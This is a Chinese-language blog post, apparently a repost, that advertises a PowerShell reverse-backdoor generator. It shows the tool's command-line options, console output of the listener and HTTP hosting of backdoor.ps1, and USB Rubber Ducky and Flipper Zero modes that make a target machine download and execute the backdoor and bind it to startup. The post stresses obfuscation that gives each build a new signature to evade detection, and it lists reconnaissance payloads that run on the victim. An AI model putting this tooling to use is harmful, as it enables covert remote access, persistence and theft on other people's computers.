Powershell - 后门生成器

2023-02-23 14:52:05 浏览数 (2)

用 Powershell 编写并用 Python 混淆的反向后门。允许后门在每次运行后都有一个新的签名。还可以为 Flipper Zero 和 USB Rubber Ducky 生成自动运行脚本。

代码语言:javascript复制
usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
                 [--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]

Powershell Backdoor Generator

options:
  -h, --help            show this help message and exit
  --ip-address IP_ADDRESS, -i IP_ADDRESS
                        IP Address to bind the backdoor too (default: 192.168.X.XX)
  --port PORT, -p PORT  Port for the backdoor to connect over (default: 4444)
  --random, -r          Randomizes the outputed backdoor's file name
  --out OUT, -o OUT     Specify the backdoor filename (relative file names)
  --verbose, -v         Show verbose output
  --delay DELAY         Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
  --flipper FLIPPER     Payload file for flipper zero (includes EOL conversion) (relative file name)
  --ducky               Creates an inject.bin for the http server
  --server-port SERVER_PORT
                        Port to run the HTTP server on (--server) (default: 8080)
  --payload PAYLOAD     USB Rubber Ducky/Flipper Zero backdoor payload to execute
  --list--payloads      List all available payloads
  -k KEYBOARD, --keyboard KEYBOARD
                        Keyboard layout for Bad Usb/Flipper Zero (default: us)
  -A, --actually-listen
                        Just listen for any backdoor connections
  -H, --listen-and-host
                        Just listen for any backdoor connections and host the backdoor directory
代码语言:javascript复制
Flipper Zero有效载荷
从远程系统下载文件
获取目标计算机的公共IP地址
列出本地用户
查找感兴趣的文件
获取操作系统信息
获取BIOS信息
获取反病毒状态
获取活跃的TCP客户端
检查已安装的常见测试软件

将在当前工作目录中创建一个名为 backdoor.ps1 的文件

代码语言:javascript复制
C:UsersDrewQDesktoppowershell-backdoor-main> python .listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL BREAK to stop

USB/USB Rubber Ducky 攻击

当使用这些攻击中的任何一种时,您将打开托管后门的 HTTP 服务器。一旦检索到后门,HTTP 服务器将被关闭

  • Execute -- 执行后门
  • BindAndExecute -- 将后门放在 temp 中,将后门绑定到 startup,然后执行它。

USB Rubber Ducky后门

代码语言:javascript复制
 C:UsersDrewQDesktoppowershell-backdoor-main> python .listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL BREAK to stop

名为 inject.bin 的文件将放置在您当前的工作目录中。此功能需要 Java。当 payload 被执行时,它会下载并执行 backdoor.ps1

5 次混淆/运行的输出

代码语言:javascript复制
sha1:c7a5fa3e56640ce48dcc3e8d972e444d9cdd2306
sha1:b32dab7b26cdf6b9548baea6f3cfe5b8f326ceda
sha1:e49ab36a7ad6b9fc195b4130164a508432f347db
sha1:ba40fa061a93cf2ac5b6f2480f6aab4979bd211b
sha1:f2e43320403fb11573178915b7e1f258e7c1b3f0

https://github.com/Drew-Alleman/powershell-backdoor-generator

0 人点赞